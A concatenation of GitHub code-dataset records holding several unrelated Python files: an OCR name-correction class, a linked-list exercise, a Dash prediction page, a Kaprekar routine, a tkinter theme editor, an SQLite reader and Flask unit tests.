validated_name_list[0] == checkcode:\n self.__FixedCount__ += 1\n logging.info(u'Fixed Success!')\n else:\n logging.info(u'Validated ' + validated_name_list[0])\n logging.info(u'Fixed Falied!')\n\n\n def __AfterFixed__(self):\n logging.info(u'Error Count ' + str(self.__ErrorCount__) + u', Fixed Count ' + str(self.__FixedCount__))\n\n logging.info(u'\\n<=================End Fixed Name Data')\n\n\n def __ParseData__(self, jsondata):\n names = []\n if jsondata == None or not isinstance(jsondata, dict) or jsondata[u'regions0'] == None:\n return names\n\n regions = jsondata[u'regions0']\n regions = sorted(regions, key=lambda region: region[u'confidence'], reverse = True)\n\n for region in regions:\n if region[u'cls'] == None or region[u'result'] == None:\n continue\n\n cls = region[u'cls']\n if cls == 23:\n for result in region[u'result']:\n names.append(result)\n\n for result in region[u'ref_result']:\n names.append(result)\n\n return names\n\n\n def __CheckData__(self, name):\n if len(name) < 2:\n return False\n\n for ch in name:\n if ch in self.__LetterPatterns__:\n return False\n\n if ch in self.__NumberPatterns__:\n return False\n\n return True\n\n\n def __FixedNameData__(self, name_list):\n for name in name_list:\n if self.__CheckData__(name):\n return ConfidenceLevel.Bad, name\n\n return ConfidenceLevel.Bad, name_list[0]\n","repo_name":"killvxk/Sugar","sub_path":"DataFixed/Python/Receipt/Domestic/Air/NameDataFixed.py","file_name":"NameDataFixed.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28081350380","text":"#!python\n\nfrom __future__ import print_function\n\n\nclass Node(object):\n\n def __init__(self, data):\n \"\"\"Initialize this node with the given data\"\"\"\n self.data = data\n self.next = None\n\n\n def __repr__(self):\n \"\"\"Return a string representation of this node\"\"\"\n return 'Node({})'.format(repr(self.data))\n\n def getData(self):\n return self.data\n\n\n def getNext(self):\n return self.next\n\n\n def setData(self,newdata):\n self.data = newdata\n\n\n def setNext(self,newnext):\n self.next = newnext\n\nclass LinkedList(object):\n\n def __init__(self, iterable=None):\n \"\"\"Initialize this linked list; append the given items, if any\"\"\"\n self.head = None\n self.tail = None\n if iterable:\n for item in iterable:\n self.append(item)\n\n def __repr__(self):\n \"\"\"Return a string representation of this linked list\"\"\"\n return 'LinkedList({})'.format(self.as_list())\n\n def as_list(self):\n \"\"\"Return a list of all items in this linked list\"\"\"\n result = []\n current = self.head\n while current is not None:\n result.append(current.data)\n # result.append(current)\n current = current.next\n return result\n\n def is_empty(self):\n \"\"\"Return True if this linked list is empty, or False\"\"\"\n return self.head is None\n\n def length(self):\n \"\"\"Return the length of this linked list by traversing its nodes\"\"\"\n #set a counter\n myint = 0\n #create a pointer that points to head\n firstNode = self.head\n #while the firstNode has a value add +1 to the counter\n while firstNode is not None:\n myint+=1\n firstNode = firstNode.next\n return myint\n\n\n\n\n def append(self, item):\n \"\"\"Insert the given item at the tail of this linked list\"\"\"\n #create a new node\n newNode = Node(item)\n #find node at tail\n #point from that last node in tail to new node\n if self.tail == None :\n self.tail = newNode\n self.head = newNode\n return\n\n 
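[Editor's note] In the NameDataFixed.py record above, `__FixedDataWithValidate__` unpacks three values from `self.__CheckData__(name_list)`, but `__CheckData__` takes a single name and returns a bool — judging by `__FixedData__`, the intended call is presumably `__FixedNameData__`, which returns two values. A hedged sketch of the corrected flow, with `fix` standing in for that method:

```python
def fixed_data_with_validate(names, validated, fix):
    """Sketch of __FixedDataWithValidate__ with the unpacking fixed.

    `fix` plays the role of __FixedNameData__ and returns (confidence, name).
    """
    if not validated or not names:
        return None
    if validated[0] == names[0]:
        return names[0]                      # already correct, nothing to fix
    confidence, fixed = fix(names)           # two values, matching __FixedData__
    return fixed if fixed == validated[0] else None

print(fixed_data_with_validate(["J0HN"], ["JOHN"], lambda ns: ("bad", "JOHN")))
```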
self.tail.next = newNode\n #point tail to newNode\n self.tail = newNode\n\n def prepend(self, item):\n \"\"\"Insert the given item at the head of this linked list\"\"\"\n nodeNew = Node(item)\n\n if self.head == None:\n self.head = nodeNew\n self.tail = nodeNew\n return\n\n self.head.next = nodeNew\n self.head = nodeNew\n\n\n\n def delete(self, item):\n \"\"\"Delete the given item from this linked list, or raise ValueError\"\"\"\n current = self.head\n previous = None\n\n while current is not None:\n if current.getData() == item:\n if self.head == current:\n self.head = current.next\n if self.tail == current:\n self.tail = previous\n if previous:\n previous.next = current.next\n return\n previous = current\n current = current.next\n\n raise ValueError('Item not found: {}'.format(item))\n\n def find(self, quality):\n \"\"\"Return an item from this linked list satisfying the given quality\"\"\"\n #TODO: find item where quality(item) is True\n current = self.head\n\n while current:\n if quality(current.data):\n return current.data\n else:\n current = current.next\n if current is None:\n\n return None\n\n\n\ndef test_linked_list():\n ll = LinkedList()\n print(ll)\n ll.append('A')\n print(ll)\n ll.append('B')\n print(ll)\n ll.append('C')\n print(ll)\n print('head: ' + str(ll.head))\n print('tail: ' + str(ll.tail))\n print(ll.length())\n ll.delete('A')\n print(ll)\n ll.delete('C')\n print(ll)\n ll.delete('B')\n print(ll)\n print('head: ' + str(ll.head))\n print('tail: ' + str(ll.tail))\n print(ll.length())\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n test_linked_list()\n","repo_name":"MakeSchool-18/Linked-List-Nkdream","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25705596088","text":"import dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nimport matplotlib.pyplot as plt\nfrom plotly.tools import mpl_to_plotly\n\nfrom app import app\n\n\ncolumn1 = dbc.Col(\n [\n # dcc.Markdown(\n # \"\"\"\n \n # ## Predictions\n\n\n # \"\"\"\n # ),\n # html.H6('Model Selection'),\n # dcc.Dropdown(\n # id='model',\n # # value=5,\n # options=[{'label': i, 'value' : i} for i in ['Random Forest','XG Boost']], \n # ),\n # html.Div(id='test',children='output will go here'), \n # html.Br(),\n # html.H6('Year of Release'),\n # dcc.Dropdown(\n # id='year-drop',\n # value=1960,\n # options=[{'label': i, 'value' : i} for i in [i for i in range(1960,2019)]], \n # ),\n html.Br(),\n html.Br(),\n html.H6('US Popularity Level'),\n dcc.Slider(\n id='slider-1',\n min=90,\n max=100,\n value= 45,\n step=.1,\n# marks={i:str(i) for i in range(90,101)},\n \n ),\n html.H6('Beat Strength'),\n dcc.Slider(\n id='slider-2',\n min=.01,\n max=1,\n step=.01,\n value = .5,\n# marks={i:str(i) for i in range(1,11)},\n \n ),\n html.H6('Bounciness'),\n dcc.Slider(\n id='slider-3',\n min=.01,\n max=1,\n step=.01,\n value = .5,\n# marks={i:str(i) for i in range(1,11)},\n \n ),\n html.H6('Danceability'),\n dcc.Slider(\n id='slider-4',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(0,2)},\n \n ),\n html.H6('Dynamic Range'),\n dcc.Slider(\n id='slider-5',\n min=0.01,\n max=38,\n step=0.01,\n value = 19,\n# marks={i:str(i) for i in range(0,39)},\n \n ),\n html.H6('Energy'),\n dcc.Slider(\n id='slider-6',\n 
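[Editor's note] The `prepend` in the linkedlist.py record above does `self.head.next = nodeNew` before moving the head, which points the old head *forward* at the new node and orphans the rest of the list. The new node's `next` must be linked to the old head instead; a self-contained sketch:

```python
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = None
        self.tail = None

    def prepend(self, item):
        """Insert at the head in O(1) without dropping the rest of the list."""
        node = Node(item)
        if self.head is None:     # empty list: new node is both head and tail
            self.head = node
            self.tail = node
            return
        node.next = self.head     # link first, then move the head pointer
        self.head = node

    def as_list(self):
        out, cur = [], self.head
        while cur is not None:
            out.append(cur.data)
            cur = cur.next
        return out

ll = LinkedList()
for x in "CBA":
    ll.prepend(x)
print(ll.as_list())   # ['A', 'B', 'C'] -- nothing is lost
```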
min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,11)},\n \n ),\n html.H6('Instrumentalness'),\n dcc.Slider(\n id='slider-7',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(0,1)},\n \n ),\n html.H6('Mechanism'),\n dcc.Slider(\n id='slider-8',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,9)},\n \n ),\n html.H6('Organism'),\n dcc.Slider(\n id='slider-9',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,9)},\n \n ),\n html.H6('Speechiness'),\n dcc.Slider(\n id='slider-10',\n min=0.1,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,9)},\n \n ),\n html.H6('Tempo'),\n dcc.Slider(\n id='slider-11',\n min=60,\n max=240,\n step=5,\n value = 92,\n marks={i:str(i) for i in range(60,241,20)},\n \n ),\n html.Br(),\n html.Br(),\n html.H6('Year of Release'),\n dcc.Slider(\n id='slider-0',\n min=1960,\n max=2020,\n step=1,\n value = 1990,\n marks={i:str(i) for i in range(1960,2021,10)},\n \n ),\n \n \n html.Br(),\n html.Br(),\n html.Br(),\n \n ],\n md=4,\n)\n\n# matplotlib_figure = plt.figure()\n# x = [10, 8, 13, 9, 11, 14, 6, 4, 12, 7, 5]\n# y = [ 8, 6, 7, 8, 8, 9, 7, 4, 10, 4, 5]\n# plt.scatter(x, y)\n# plotly_figure = mpl_to_plotly(matplotlib_figure)\n\n\ncolumn2 = dbc.Col(\n [ html.Br(),\n html.Div(id='prediction-text1',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n html.Br(), \n html.Div(id='prediction-text2',children='output will go here',style={'fontSize': 16}),\n html.Br(), \n html.Div(id='prediction-text3',children='output will go here',style={'color': 'green', 'fontSize': 16}),\n html.Div(id='prediction-text4',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n html.Div(id='prediction-text5',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n html.Br(), \n html.Div(id='prediction-text6',children='output will go here',style={'fontSize': 16}), \n html.Div(id='prediction-text7',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n \n ],\n md=3,\n \n)\n\ncolumn3 = dbc.Col(\n [\n # html.Div(id='prediction-text',children='output will go here'), \n dcc.Markdown(\n \"\"\"\n \n **Instructions**: Adjust the attribute sliders. Your prediction outcome will update dynamically. \n\n Attribute Definitions:\n\n * **US Popularity Level** - Highest point on Billboard \n * **Beat Strength** - The energy level at beat intervals\n * **Bounciness** - Length of decay of initial beat\n * **Danceability** - Danceability describes how suitable a track is for dancing based on a combination of musical elements including tempo, rhythm stability, beat strength, and overall regularity. A value of 0.0 is least danceable and 1.0 is most danceable. \n * **Dynamic Range** - The volumne difference between the loudest and quietest parts of the track\n * **Energy** - Energy is a measure from 0.0 to 1.0 and represents a perceptual measure of intensity and activity.\n * **Instrumentalness** - Predicts whether a track contains no vocals. The closer the instrumentalness value is to 1.0, the greater likelihood the track contains no vocal content.\n * **Mechanism** - Whether a song sticks rigidly to a click track or drum machine, or is more organic and \"tempo-wandering\"\n * **Organism** - Organism is how human a track sounds, using a live drummer rather than a drum machine for example.\n * **Speechiness** - Speechiness detects the presence of spoken words in a track. 
The more exclusively speech-like the recording (e.g. talk show, audio book, poetry), the closer to 1.0 the attribute value. \n * **Tempo** - The overall estimated tempo of a track in beats per minute (BPM). In musical terminology, tempo is the speed or pace of a given piece and derives directly from the average beat duration. \n * **Year of Release** - Year the track was released \n\n\n\n\n \"\"\"\n ),\n # html.Div(id='shapley',children='output will go here'),\n# dcc.Graph(id='my-graph-name', figure=plotly_figure)\n \n ]\n \n)\n\nlayout = dbc.Row([column1, column2, column3]) \n\n ","repo_name":"zwarshavsky/spotify-playlist-skipping-predictions","sub_path":"pages/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27144829572","text":"l1 = [1, 3, 5, 7, 9] # list mutable (read write)\nt1 = (1, 3, 5, 7, 9) # tuple imutable (read only)\n\n\ndef f(x):\n x.append(29)\n\nf(l1)\nprint(l1)\nf(t1)\nprint(t1)","repo_name":"decagondev/CS35_IntroPython_GP","sub_path":"day2/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75020896551","text":"'''Kaprekar'''\n\n\ndef reorder(num):\n '''reorder Cr. jarukit'''\n num_a, num_b, num_c, num_d = int(num[0]), int(\n num[1]), int(num[2]), int(num[3])\n if num_a > num_b:\n num_a, num_b = num_b, num_a\n if num_c > num_d:\n num_c, num_d = num_d, num_c\n if num_a > num_c:\n num_a, num_c = num_c, num_a\n if num_b > num_d:\n num_b, num_d = num_d, num_b\n if num_b > num_c:\n num_b, num_c = num_c, num_b\n return str(num_a), str(num_b), str(num_c), str(num_d)\n\n\ndef kaprekar(num):\n '''More like paprika'''\n count = 0\n result = 0\n nnum = reorder(num)\n while result != 6174:\n lowest = int(nnum[0]+nnum[1]+nnum[2]+nnum[3])\n highest = int(nnum[3]+nnum[2]+nnum[1]+nnum[0])\n result = highest-lowest\n nnum = reorder(str(result).zfill(4))\n count += 1\n print(count)\n\n\nkaprekar(input())\n","repo_name":"Maldin0/Python","sub_path":"099-Kaprekar.py","file_name":"099-Kaprekar.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42451631744","text":"import os\nimport tkinter\nimport json\nimport shutil\nfrom tkinter import colorchooser\nfrom tkinter import filedialog\n'''\nThis is the main file of the theme editor\n'''\n\n\nclass editor():\n '''\n This fuc is the main programme\n '''\n def readFile(name: str, startRow: int = 0, endRow: int = 1) -> str:\n '''\n @ name: The Name of the file\\n\n @ startRow: The row you want to start\\n\n @ endRow: The row you want to stop\\n\n This fuction is used to read a file.\n '''\n result = ''\n # open the file user want to read.\n with open(name, mode='r') as file:\n fileList = []\n fileList = file.readlines()\n if endRow > len(fileList):\n endRow = len(fileList)\n for index in range(0, endRow):\n if index >= startRow:\n result += fileList[index]\n continue\n return result\n\n def __init__(self) -> None:\n '''\n The fuc used to init the programme\n '''\n settings = json.loads(editor.readFile(\n \"./data/setting.json\", 0, 100))\n themePath = settings[\"themePath\"]\n self.uiSettings = json.loads(editor.readFile(\n f\"{themePath}/ui.json\", 0, 100))\n settings = json.loads(editor.readFile(\n \"./data/setting.json\", 0, 100))\n sourcePath = 
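[Editor's note] The predictions.py record above lays out slider inputs and `prediction-text*` output divs, but the callback tying them together is not in this section. A minimal sketch of how that wiring would look in the same Dash era (the legacy `dash_core_components`/`dash_html_components` imports match the record); the callback body is a placeholder, not the record's model:

```python
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output

app = dash.Dash(__name__)
app.layout = html.Div([
    dcc.Slider(id='slider-11', min=60, max=240, step=5, value=92),
    html.Div(id='prediction-text1'),
])

# One Input per slider; Dash re-runs this whenever any listed slider moves.
@app.callback(Output('prediction-text1', 'children'),
              [Input('slider-11', 'value')])
def update_prediction(tempo):
    # Placeholder logic; the record presumably feeds these values to a model.
    return f'Tempo set to {tempo} BPM'

if __name__ == '__main__':
    app.run_server(debug=True)
```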
settings[\"themePath\"]\n self.sourceSettings = json.loads(editor.readFile(\n f\"{sourcePath}/sources.json\", 0, 100))\n\n def color_callback() -> str:\n '''\n This fuction returns a color value\n '''\n colorValue = colorchooser.askcolor(title=\"Choose color\")[1]\n return colorValue if colorValue != None else [0, 0, 0]\n\n def fontSize_Callback(self):\n self.sourceSettings['fontSize'] = self.ent.get()\n\n def callback(self, settingName) -> None:\n ''''\n The Call back of button_playerWig\n '''\n if settingName in self.uiSettings:\n self.uiSettings[settingName] = editor.color_callback()\n if settingName in self.sourceSettings:\n if settingName != 'fontSize':\n self.sourceSettings[settingName] = filedialog.askopenfile()\n else:\n window = tkinter.Tk()\n window.title = 'FontSize'\n self.ent = tkinter.Entry(window, relief=\"flat\")\n self.ent.pack(fill=\"x\")\n tkinter.Button(window, relief=\"flat\", text=\"OK\",\n command=lambda: editor.fontSize_Callback(self)).pack(fill=\"x\")\n tkinter.mainloop()\n\n def saveAs(self):\n \"\"\"\n This fuc is used to store the configs \n \"\"\"\n os.makedirs(self.themeName)\n shutil.copytree(\"./\"+self.themeName, './themes')\n with open(\"ui.json\", mode='a+') as ui:\n uiJSon = json.dumps(self.uiSettings)\n ui.write(uiJSon)\n with open(\"sources.json\") as sources:\n sourceJson = json.dumps(self.sourceSettings)\n sources.write(sourceJson)\n shutil.copyfile(\"ui.json\",f\"./themes/{self.themeName}\")\n shutil.copyfile(\"sources.json\",f\"./themes/{self.themeName}\")\n for path in self.sourceSettings:\n shutil.copyfile(path,f\"./themes/{self.themeName}\")\n quit()\n def set_themeName(self):\n self.themeName = self.entry.get()\n\n def main(self):\n '''\n main Programme\n '''\n\n self.themeName = \"New Theme\"\n window = tkinter.Tk()\n window.title(\"Theme Editor\")\n tkinter.Label(window, text=\"--=Plane War Theme Editor=--\",\n height=3,).pack(fill='x')\n listFrame = tkinter.Frame()\n listBox = tkinter.Listbox(listFrame, relief=\"flat\", height=18, width=100, foreground=\"#aaaaaa\",\n highlightcolor=\"#0A59f7\", highlightbackground=\"#f1f3f5\", selectbackground=\"#0A59f7\", selectforeground=\"#ffffff\")\n for key in self.uiSettings:\n listBox.insert(\"end\", key,)\n for key in self.sourceSettings:\n listBox.insert(\"end\", key,)\n listBox.pack(fill='both')\n tkinter.Button(listFrame, text='Change', relief='flat', highlightcolor=\"#0A59F7\",\n command=lambda: editor.callback(self, listBox.get(\"active\"))).pack(fill=\"x\")\n tkinter.Button(listFrame, text='Output Into File', relief='flat',\n command=lambda: editor.saveAs(self)).pack(fill=\"x\")\n tkinter.Label(window, text=\"Theme Name?\").pack()\n self.entry = tkinter.Entry(window, bg=\"#ffffff\").pack()\n tkinter.Button(window, relief=\"flat\", border=0, text=\"\").pack()\n listFrame.pack(fill='x')\n tkinter.mainloop()\n\n\nif __name__ == \"__main__\":\n self = editor()\n editor.main(self)\n","repo_name":"HQYSteven/PlaneWar","sub_path":"py/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70471264233","text":"# -*- coding = utf-8 -*-\n# @Time : 2021/4/20 15:56\n# @Author : Hermit \n# @Fill : test.py\n# @software : PyCharm\nimport os\nimport subprocess\nimport DBOperation\nimport sqlite3\n# -641.0068\n# -143.3987\n# 0.1379\n# feed rate:0mm/min\n# spindle speed: 0degree\n# spindle load: 0\n\ndef testReadData(DBPath):\n order = r\".\\readdata\\Test.exe\"\n pi = 
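[Editor's note] Two bugs in the editor.py record above: `window.title = 'FontSize'` assigns over the method instead of calling it, and `self.entry = tkinter.Entry(window, bg="#ffffff").pack()` stores `pack()`'s return value (`None`), so the later `self.entry.get()` fails. A minimal corrected sketch:

```python
import tkinter

window = tkinter.Tk()
window.title("FontSize")            # call the method; assigning to it shadows it

entry = tkinter.Entry(window, bg="#ffffff")
entry.pack()                        # pack() returns None, so keep the reference
                                    # returned by Entry(...) itself
print(entry.get())                  # works now; .get() on None would raise
window.destroy()
```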
subprocess.Popen(order, shell=True, stdout=subprocess.PIPE)\n index = 0\n mcData = []# x y z fr sps spl v设为0\n try:\n for i in iter(pi.stdout.readline, 'b'):\n item = i.decode('gbk') # 编码问题\n item = item[:-2] # 去掉\\r\\n\n mcData.append(item)\n if item =='':\n print(mcData)\n DBOperation.saveData(DBPath, mcData[5], mcData[4], str(0), mcData[0], mcData[1], mcData[2], mcData[3])\n mcData = []\n except ValueError as e:\n print(str(e))\n\ndef readData(dbpath):\n cor = []# 坐标列表\n cors = []\n sql ='''\n select cutterpos_x,cutterpos_y,cutterpos_z from MachineData\n order by timestamp desc limit 800\n '''\n conn = sqlite3.connect(dbpath) # 连接 有数据库就连接 没有就创建\n cursor = conn.cursor() # 获取游标\n cursor.execute(sql) # 执行SQL语句\n for row in cursor:\n cor.append(row[0])\n cor.append(row[1])\n cor.append(row[2])\n if len(cor)==3:\n cors.append(cor)\n cor =[]\n conn.commit() # 结束数据库事务\n conn.close() # 关闭连接\n return cors\n\n\nDBPath = \"Machine.db\"\nprint(readData(DBPath))","repo_name":"Hermit-Alex/WebPage","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1186135977","text":"file = open('input2.txt')\r\n\r\nlines = file.readlines()\r\n\r\nfile.close()\r\n\r\ndistance = 0\r\ndepth = 0\r\naim = 0\r\n\r\nfor raw_line in lines:\r\n line = raw_line.strip('\\n')\r\n val = int(line[-1])\r\n\r\n if line[0] == 'f':\r\n distance += val\r\n depth += val * aim\r\n if line[0] == 'd':\r\n aim += val\r\n if line[0] == 'u':\r\n aim -= val\r\n\r\nprint(depth * distance)","repo_name":"benfried129/Advent-of-Code","sub_path":"Day-2/d2p2.py","file_name":"d2p2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44154614257","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n9 (9) As a car owner I want to choose a service(common, plus, premium) So that my car needs to fix\n\"\"\"\n\nimport json\nimport unittest\n\n\nfrom app import db, app\nfrom config import DataBaseConfig\nfrom persistence.database.entity.service_grade import ServiceGrade\nfrom persistence.database.entity.user.user import User\nfrom routers.admin import admin\nfrom routers.authintication import authentication\nfrom routers.car_owner import car_owner\nfrom routers.choose_services import choose_service_grade\nfrom routers.index import index_route\nfrom test_cases.fill_db import init_db\n\n\nclass RegistersTest(unittest.TestCase):\n # executed prior to each test\n def setUp(self):\n app.config['TESTING'] = True\n app.config['WTF_CSRF_ENABLED'] = False\n app.config['DEBUG'] = False\n app.config[\n 'SQLALCHEMY_DATABASE_URI'] = DataBaseConfig.DB_DIALECT + DataBaseConfig.USER_NAME + ':' + DataBaseConfig.PASSWORD + '@' + DataBaseConfig.SERVER_ADDRESS + ':' + DataBaseConfig.PORT + '/' + DataBaseConfig.DATABASE_NAME\n app.register_blueprint(index_route)\n app.register_blueprint(car_owner)\n app.register_blueprint(authentication)\n app.register_blueprint(admin)\n app.register_blueprint(choose_service_grade)\n\n self.app = app.test_client()\n\n # db.drop_all()\n init_db()\n\n # Disable sending emails during unit testing\n # self.assertEqual(app.debug, False)\n\n # executed after each test\n def tearDown(self):\n pass\n\n @classmethod\n def setUpClass(cls):\n pass\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n # success scenario\n\n def test_get_service_grade(self):\n list_returned = 
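[Editor's note] The test.py record above iterates `iter(pi.stdout.readline, 'b')`: the sentinel is the one-character *string* `'b'`, which never equals a bytes line, so the loop only ever ends through the exception handler. On a bytes pipe the sentinel must be `b''`; alternatively, pass `encoding=` to `Popen` and compare against `""`. A runnable sketch (the `echo` command is a stand-in for the record's `.\readdata\Test.exe`):

```python
import subprocess

pi = subprocess.Popen("echo hello", shell=True,
                      stdout=subprocess.PIPE, encoding="gbk")

# With encoding set, readline returns str and the empty-string sentinel works;
# on a raw bytes pipe the sentinel would have to be b'', not 'b'.
for line in iter(pi.stdout.readline, ""):
    print(line.rstrip("\r\n"))
pi.wait()
```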
ServiceGrade.list_service_grades()\n list_returned1 = ServiceGrade.list_service_grades()\n self.assertEqual(list_returned[1], list_returned[1])\n\n def test_get_service_type_by_service_grade(self):\n list_returned = ServiceGrade.list_service_types(1)\n # list_returned[1][0][0].service_types[0].name\n list_returned[1].dictionary_creator()\n self.assertEqual(list_returned[1], list_returned[1])\n\n def test_register_admin(self):\n data = {\n \"name\": \"امید\",\n \"last_name\": \"شعبانی\",\n \"password\": \"Amish147852\",\n \"phone_number\": \"09372943761\",\n \"user_type\": \"1\"\n }\n json_obj = json.dumps(data)\n\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n response = client.post('/register_admin', data=json_obj, content_type='application/json')\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n #\n\n data = {\n \"code\": User.query.filter(User.phone_number== \"09372943761\").first().code,\n \"phone_number\": \"09372943761\",\n }\n json_obj = json.dumps(data)\n\n response = client.post('/validate_user', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n #\n # data = {\n # \"car_owner_id\": \"1234\",\n # \"car_id\": \"1\",\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.delete('/car_owner/cars/1', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n #\n # data = {\n # \"car_owner_id\": \"1234\",\n # \"car_id\": \"1\",\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.put('/car_owner/cars/1', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n #\n # data = {\n # \"phone_number\": \"09125200492\",\n # \"name\": \"امید\",\n # \"password\": \"Amish1234\",\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.post('/register/iws', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n #\n # data = {\n # \"car_owner\": \"1\",\n # \"car_info\": {\"vin_number\": 'iRFC93R21SN497641', \"plate_number\": '79ط749-33', \"auto_type\": '1'}\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.post('/car_owner/cars', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n\n data = {\n \"name\": \"امیر\",\n \"password\": \"Amish1234\",\n \"phone_number\": \"09122341484\",\n \"reg_id\": \"1\",\n # \"user_type\": \"1\"\n }\n json_obj = json.dumps(data)\n\n response = client.post('/register_user', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n\n data = {\n \"phone_number\": \"09125200492\",\n \"name\": \"امید\",\n \"password\": \"Amish1234\",\n \"regId\": \"\",\n \"os\": \"\"\n }\n json_obj = json.dumps(data)\n\n response = client.post('/login', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n\n response = client.post('/login/iws', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n\n def 
test_return_service_grade_list(self):\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n response = client.get('/services/service_grades', content_type='application/json')\n print(response.data)\n self.assertEqual(response.status_code, 200)\n\n response = client.post('/services/service_grades', content_type='application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_add_new_service_grade(self):\n data = {\n \"name\": \"+\"\n }\n json_obj = json.dumps(data)\n\n response = self.app.post('/services/service_grades', data=json_obj, content_type='application/json')\n self.assertEqual(400, response.status_code)\n\n data = {\n \"service_grade_name\": \"+\"\n }\n json_obj = json.dumps(data)\n\n response = self.app.post('/services/service_grades', data=json_obj, content_type='application/json')\n self.assertEqual(200, response.status_code)\n\n data = {\n \"service_grade_name\": \" \"\n }\n json_obj = json.dumps(data)\n\n response = self.app.post('/services/service_grades', data=json_obj, content_type='application/json')\n self.assertEqual(400, response.status_code)\n print(response.data)\n # grade = ServiceGrade(name=\"common\")\n # type_ = ServiceType(name=\"nothing\")\n # grade.service_types.append(type_)\n # db.session.add(grade)\n # db.session.commit()\n # grades_list = ServiceGrade.list_service_grades()\n\n def _post_request(self, url, data):\n json_obj = json.dumps(data)\n response = self.app.post(url, data=json_obj, content_type='application/json')\n print(response.data)\n return response\n\n def _test_add_new_service_type(self, data, expected_response):\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n response = self._post_request('/services/service_types', data)\n print(response)\n self.assertEqual(expected_response, response.status_code)\n\n def test_add_new_service_type_(self):\n data = {\n \"service_type\": {\n \"name\": \"change oidfgfgfl\",\n \"price\": 10\n },\n \"service_grades\": [1, 2]\n }\n self._test_add_new_service_type(data, 404)\n\n def test_add_new_service_type_bad_request(self):\n data = {\n \"service_type\": {\n \"name\": \"تعویض روغن\",\n \"price\": \"10\"\n },\n \"service_grades\": [1, 2]\n }\n self._test_add_new_service_type(data, 400)\n\n def test_add_new_service_type(self):\n test_data = [\n {\n 'data': {\n \"service_type\": {\n \"name\": \"change oidfgfgfl\",\n \"price\": 10\n },\n \"service_grades\": [1, 2]\n },\n 'expected': 200\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"تعویض روغن\",\n \"price\": \"10\"\n },\n \"service_grades\": [1, 2]\n },\n 'expected': 400\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"dfdfdfdf\",\n \"price\": 1000\n },\n \"service_grades\": [1, 2]\n },\n 'expected': 200\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"تعویض روغن\",\n \"price\": 1000\n },\n \"service_grades\": [1]\n },\n 'expected': 200\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \"\",\n \"price\": 1000\n },\n \"service_grades\": [1]\n },\n 'expected': 400\n },\n {\n 'data': {\n \"service_type\": {\n \"name\": \" \",\n \"price\": 1000\n },\n \"service_grades\": [1]\n },\n 'expected': 400\n }\n ]\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n\n\nif __name__ == 